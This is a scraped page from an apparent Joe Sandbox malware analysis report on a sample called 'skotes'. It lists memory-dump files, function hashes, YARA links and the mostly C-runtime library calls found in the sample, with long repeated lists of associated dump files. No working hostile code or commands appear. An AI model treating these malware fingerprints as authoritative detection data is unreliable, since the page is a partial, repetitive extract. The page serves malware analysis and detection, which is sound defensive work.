Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
String ID:
API String ID: 1091748018-0
Opcode ID: d53e7dea43852cff18fb0635744a153ff7bb7dc555e2f48da9f7d4a4f726ad28
Instruction ID: de0a025d5247d928ce354bee22c0098e833a82d14154382410131bec85115938
Opcode Fuzzy Hash: d53e7dea43852cff18fb0635744a153ff7bb7dc555e2f48da9f7d4a4f726ad28
Instruction Fuzzy Hash: 4D41F070604214ABDF19EBA4C896BBEBB79EF45310F148199E5079B3C2CB70AE45C791

Function 00C056AF Relevance: 6.1, APIs: 4, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_InternalDeleteHelper.LIBCONCRT ref: 00C056F2
_InternalDeleteHelper.LIBCONCRT ref: 00C05726
Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 00C0578B
SafeRWList.LIBCONCRT ref: 00C0579A

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
String ID:
API String ID: 893951542-0
Opcode ID: 862f8064ef28450efe5f2c098f886f01113b57a9358be630b396cb4690a8d6ca
Instruction ID: f6e3153d2f3eeb369bdc72b4697558bf0bb667240c35a10cee63cf8b735f4b64
Opcode Fuzzy Hash: 862f8064ef28450efe5f2c098f886f01113b57a9358be630b396cb4690a8d6ca
Instruction Fuzzy Hash: 17312436B10614DFCF09AF24C885BAE73A6AF89710F184278E9059F395DF30AE05CB90

Function 00C02CFC Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00C02D0F

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: 98c5aaadfc6d7524ad8ac1f04eeb3e3c42ff4804712686d62467d360a996a391
Instruction ID: feb195ae7fbe140f27ecbfaab4260fb86f1e85fc6d86a7befafd45ca04cdff84
Opcode Fuzzy Hash: 98c5aaadfc6d7524ad8ac1f04eeb3e3c42ff4804712686d62467d360a996a391
Instruction Fuzzy Hash: 70313775A00309DFCF14EF94C8D4BAEBBB9BB44314F1404AADD15AB286D730AE45DBA0

Function 00C113F5 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00C113FC
Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00C11447
Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 00C1147A
Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 00C1152A

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
String ID:
API String ID: 2092016602-0
Opcode ID: 2b16a98e6c1ce71475be0382ecd8a49a969d04508f94cd463266a53e5e6894d2
Instruction ID: 4d3932ee23cdb64ded2565894d0f08c23eac623e55f4859d38d321ded32b7cfe
Opcode Fuzzy Hash: 2b16a98e6c1ce71475be0382ecd8a49a969d04508f94cd463266a53e5e6894d2
Instruction Fuzzy Hash: 8C318371E006059FCF04EFA9C4915EDF7F5BF49710B18822DE926A7391DB34AA41DB90

Function 00BFBB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00BFBBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 00BFBBE4
_xtime_get.LIBCPMT ref: 00BFBC07
__Xtime_diff_to_millis2.LIBCPMT ref: 00BFBC13

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 34dbf5ea86c0f535f0327ea6d2c3b3596c916e88e754a6628b9c5592cacf6817
Instruction ID: c8064f495d2dfb4ebe862086979898f466a28cb1d16ca585a62f81bb9fd174b9
Opcode Fuzzy Hash: 34dbf5ea86c0f535f0327ea6d2c3b3596c916e88e754a6628b9c5592cacf6817
Instruction Fuzzy Hash: DB212F75A0011DAFDF00EFA8DD81EBEBBB9EF08714F500495FA01A7251DB319D499BA0

Function 00C09C95 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00C09C9C
Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00C09CE8
std::bad_exception::bad_exception.LIBCMT ref: 00C09CFE
std::bad_exception::bad_exception.LIBCMT ref: 00C09D6A

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
